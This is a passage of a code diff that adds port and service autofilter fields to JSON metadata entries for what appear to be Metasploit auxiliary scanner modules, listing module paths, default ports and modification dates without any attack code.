+ ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb", @@ -18909,6 +25875,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/robots_txt.rb", @@ -18940,6 +25921,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/s40_traversal.rb", @@ -18969,6 +25965,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb", @@ -18998,6 +26009,22 @@ "platform": "", "arch": "", "rport": 6405, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 6405 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb", @@ -19027,6 +26054,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb", @@ -19056,6 +26098,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb", @@ -19085,6 +26142,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/scraper.rb", @@ -19114,6 +26186,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sentry_cdu_enum.rb", @@ -19143,6 +26230,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb", @@ -19172,6 +26274,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sevone_enum.rb", @@ -19205,6 +26322,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/http/simple_webserver_traversal.rb", @@ -19238,6 +26370,21 @@ "platform": "", "arch": "", "rport": 49152, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb", @@ -19270,6 +26417,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb", @@ -19301,6 +26463,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb", @@ -19332,6 +26500,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb", @@ -19361,6 +26544,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/scanner/http/soap_xml.rb", @@ -19391,6 +26589,21 @@ "platform": "", "arch": "", "rport": 4444, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sockso_traversal.rb", @@ -19421,6 +26634,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/splunk_web_login.rb", @@ -19450,6 +26678,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/squid_pivot_scanning.rb", @@ -19480,6 +26723,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb", @@ -19511,6 +26769,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/ssl.rb", @@ -19542,6 +26806,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/ssl_version.rb", @@ -19575,6 +26854,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-08 19:00:11 +0000", "path": "/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb", @@ -19604,6 +26898,21 @@ "platform": "", "arch": "", "rport": 9080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/surgenews_user_creds.rb", @@ -19633,6 +26942,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/svn_scanner.rb", @@ -19662,6 +26986,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb", @@ -19695,6 +27034,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb", @@ -19726,6 +27080,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb", @@ -19760,6 +27129,21 @@ "platform": "", "arch": "", "rport": 41080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb", @@ -19789,6 +27173,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb", @@ -19818,6 +27217,21 @@ "platform": "", "arch": "", "rport": 31001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb", @@ -19847,6 +27261,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/title.rb", @@ -19879,6 +27308,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/tomcat_enum.rb", @@ -19927,6 +27371,25 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 8081, + 8444, + 9080, + 19300 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-02-13 14:31:56 +0000", "path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb", @@ -19960,6 +27423,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb", @@ -19991,6 +27469,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/trace.rb", @@ -20020,6 +27513,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/trace_axd.rb", @@ -20049,6 +27557,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/typo3_bruteforce.rb", @@ -20078,6 +27601,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/vcms_login.rb", @@ -20107,6 +27645,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/verb_auth_bypass.rb", @@ -20136,6 +27689,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/vhost_scanner.rb", @@ -20166,6 +27734,21 @@ "platform": "", "arch": "", "rport": 85, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/wangkongbao_traversal.rb", @@ -20195,6 +27778,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/web_vulndb.rb", @@ -20224,6 +27822,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/webdav_internal_ip.rb", @@ -20253,6 +27866,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/webdav_scanner.rb", @@ -20282,6 +27910,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/webdav_website_content.rb", @@ -20313,6 +27956,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/webpagetest_traversal.rb", @@ -20345,6 +28003,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wildfly_traversal.rb", @@ -20380,6 +28053,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_content_injection.rb", @@ -20412,6 +28100,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb", @@ -20449,6 +28152,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb", @@ -20482,6 +28200,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-06-14 13:28:03 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_login_enum.rb", @@ -20514,6 +28247,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb", @@ -20548,6 +28296,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_pingback_access.rb", @@ -20577,6 +28340,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_scanner.rb", @@ -20608,6 +28386,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb", @@ -20643,6 +28436,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-03 12:21:38 +0000", "path": "/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.rb", @@ -20674,6 +28482,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb", @@ -20707,6 +28530,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb", @@ -20738,6 +28576,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb", @@ -20770,6 +28623,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb", @@ -20801,6 +28669,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb", @@ -20832,6 +28715,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb", @@ -20863,6 +28761,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb", @@ -20895,6 +28808,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb", @@ -20924,6 +28852,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/xpath.rb", @@ -20955,6 +28898,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/yaws_traversal.rb", @@ -20984,6 +28942,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/zabbix_login.rb", @@ -21014,6 +28987,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb", @@ -21044,6 +29032,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb", @@ -21077,6 +29080,12 @@ "platform": "", "arch": "", "rport": 500, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.rb", @@ -21106,6 +29115,12 @@ "platform": "", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/imap/imap_version.rb", @@ -21135,6 +29150,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ip/ipidseq.rb", @@ -21169,6 +29190,12 @@ "platform": "", "arch": "", "rport": 623, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb", @@ -21203,6 +29230,12 @@ "platform": "", "arch": "", "rport": 623, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb", @@ -21233,6 +29266,12 @@ "platform": "", "arch": "", "rport": 623, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ipmi/ipmi_version.rb", @@ -21263,6 +29302,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum.rb", @@ -21292,6 +29337,12 @@ "platform": "", "arch": "", "rport": 4672, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/kademlia/server_info.rb", @@ -21321,6 +29372,12 @@ "platform": "", "arch": "", "rport": 5355, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/llmnr/query.rb", @@ -21350,6 +29407,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-21 08:50:26 +0000", "path": "/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb", @@ -21379,6 +29451,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/lotus/lotus_domino_login.rb", @@ -21408,6 +29495,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/lotus/lotus_domino_version.rb", @@ -21437,6 +29539,12 @@ "platform": "", "arch": "", "rport": 5353, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/mdns/query.rb", @@ -21469,6 +29577,12 @@ "platform": "", "arch": "", "rport": 11211, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-03-06 16:04:00 +0000", "path": "/modules/auxiliary/scanner/memcached/memcached_amp.rb", @@ -21498,6 +29612,12 @@ "platform": "", "arch": "", "rport": 11211, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-03-06 18:16:22 +0000", "path": "/modules/auxiliary/scanner/memcached/memcached_udp_version.rb", @@ -21527,6 +29647,12 @@ "platform": "", "arch": "", "rport": 5920, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/misc/cctv_dvr_login.rb", @@ -21561,6 +29687,12 @@ "platform": "", "arch": "", 